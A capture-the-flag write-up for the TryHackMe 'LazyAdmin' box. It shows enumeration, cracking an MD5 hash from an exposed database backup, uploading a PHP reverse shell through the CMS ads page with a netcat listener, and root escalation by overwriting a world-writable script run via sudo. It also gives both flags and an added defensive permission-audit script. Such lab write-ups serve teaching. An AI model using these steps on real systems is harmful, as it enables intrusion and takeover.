LazyAdmin – a tryhackme.com writeup

LazyAdmin

Another fun CTF from tryhackme.com

We don’t know anything about this box – just that we need to find the user and the root flag. Let’s start with a classic portscan.

sudo nmap -sV 10.10.215.210

That’s not much. The website looks like a default apache/ubuntu page – the source code doesn’t reveal anything either.

Just to not miss anything, let’s try gobuster.

gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.215.210

Ok, we have a folder called content. Let’s put that in the browser.

A content management system that is not properly installed. That looks promising.

Let’s run gobuster on the /content directory.

gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://10.10.215.210/content

As it turns out /as is a login page. Let’s look at /inc.

The mysql-backup is of course what we will look at first.

As it turns out there is indeed a mysql backup in that directory:

mysql_bakup_20191129023059-1.5.1.sql

Let’s download it.

wget http://10.10.153.251/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql

Let’s just grep the file for “passwd” and see.

grep -i passwd mysql_bakup_20191129023059-1.5.1.sql

We can see a username and a hashed password:

42f749ade7f9e195bf475f37a44cafcb

hash-identifier should tell us the type of hash we are looking at.

hash-identifier 42f749ade7f9e195bf475f37a44cafcb

It’s MD5.

So we try john with our favorite password list and see if we can crack it.

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 --fork=100 passwd.txt

We now know from the mysql backup file that the username is manager and from john that the password is Password123.

After logging in we see this:

We remember from looking at /inc in the browser that there was an ads directory there.

http://10.10.153.251/content/inc/ads/

And we have an ads menu here

We can put in code here. So MAYBE if we put php code here it gets saved in the ads directory and we could then call the code through the web browser.

So let’s try a reverse shell from

/usr/share/webshells/php/php-reverse-shell.php

and copy/paste it into the code section. We change the ip address to that of our local machine and leave the port at 1234.

Let’s check in the browser.


That looks good. Let’s start a netcat listener on our local machine.

nc -lvnp 1234

And then click on our file in the ads directory.

We have our shell. Let’s look for user.txt.

find / -name user.txt 2>/dev/null

we find it at

/home/itguy/user.txt

We just try 

cat /home/itguy/user.txt

and are lucky. We can read it and our user flag is

THM{63e5bce9271952aad1113b6f1ac28a07}

After this we do a

sudo -l

to see if that reveals any options to get root, and we find this:

The Backup script looks promising

/home/itguy/backup.pl

We can’t change that file:

-rw-r--r-x 1 root root 47 Nov 29 2019 /home/itguy/backup.pl

So let’s look at the code:

#!/usr/bin/perl
system("sh", "/etc/copy.sh");

So how does the copy.sh look?

ls -l /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh

Interesting – we can change that file.

We do a simple

echo "/bin/sh" > /etc/copy.sh

And then execute the perl script as root

sudo /usr/bin/perl /home/itguy/backup.pl

That worked well – so we collect the root flag.

cat /root/root.txt
THM{6637f41d0177b6f37cb20d775124699f}
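The root step works because the script sudo lets us run as root hands control to a world-writable file. A defender’s check for exactly that chain, added here as example code that is not part of the writeup: it parses the sudo-permitted Perl script for system()/exec() calls and reports any file in the chain that untrusted users can write. The temp files, their contents and the trusted_uid parameter are constructed for the demo.

```python
import os
import re
import stat
import tempfile

# Matches calls like system("sh", "/etc/copy.sh") or exec("/usr/bin/x") in a Perl script.
CALL_RE = re.compile(r'\b(?:system|exec)\s*\(([^)]*)\)')
PATH_RE = re.compile(r'"(/[^"]+)"')


def referenced_paths(script_text):
    """Absolute paths passed as string literals to system()/exec()."""
    paths = []
    for call in CALL_RE.finditer(script_text):
        paths.extend(PATH_RE.findall(call.group(1)))
    return paths


def audit_sudo_target(script_path, trusted_uid=0):
    """Check the sudo-run script and every file it invokes for writes by untrusted users.

    Returns a list of (path, reason) tuples; an empty list means the chain looks clean.
    """
    findings = []
    with open(script_path) as fh:
        chain = [script_path] + referenced_paths(fh.read())
    for path in chain:
        st = os.stat(path)
        mode = stat.S_IMODE(st.st_mode)
        if mode & stat.S_IWOTH:
            findings.append((path, "world-writable (mode %o)" % mode))
        if st.st_uid != trusted_uid:
            findings.append((path, "owned by uid %d, not %d" % (st.st_uid, trusted_uid)))
    return findings


def demo():
    """Constructed copy of the LazyAdmin chain: backup.pl (0645) calls copy.sh (0647)."""
    tmp = tempfile.mkdtemp()
    copy_sh = os.path.join(tmp, "copy.sh")
    backup_pl = os.path.join(tmp, "backup.pl")
    with open(copy_sh, "w") as fh:
        fh.write("#!/bin/sh\necho backup\n")  # constructed stand-in for /etc/copy.sh
    os.chmod(copy_sh, 0o647)  # -rw-r--rwx, the permissions listed on the box
    with open(backup_pl, "w") as fh:
        fh.write('#!/usr/bin/perl\nsystem("sh", "%s");\n' % copy_sh)
    os.chmod(backup_pl, 0o645)  # -rw-r--r-x
    # The demo files belong to us, so our uid is the trusted owner here;
    # on a real host run this as root with the default trusted_uid=0.
    return audit_sudo_target(backup_pl, trusted_uid=os.getuid())


if __name__ == "__main__":
    for path, reason in demo():
        print("%s: %s" % (path, reason))
```

On the box itself the same run would flag /etc/copy.sh and nothing else, which is the finding that should lead to chmod o-w /etc/copy.sh or to dropping the sudo rule.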
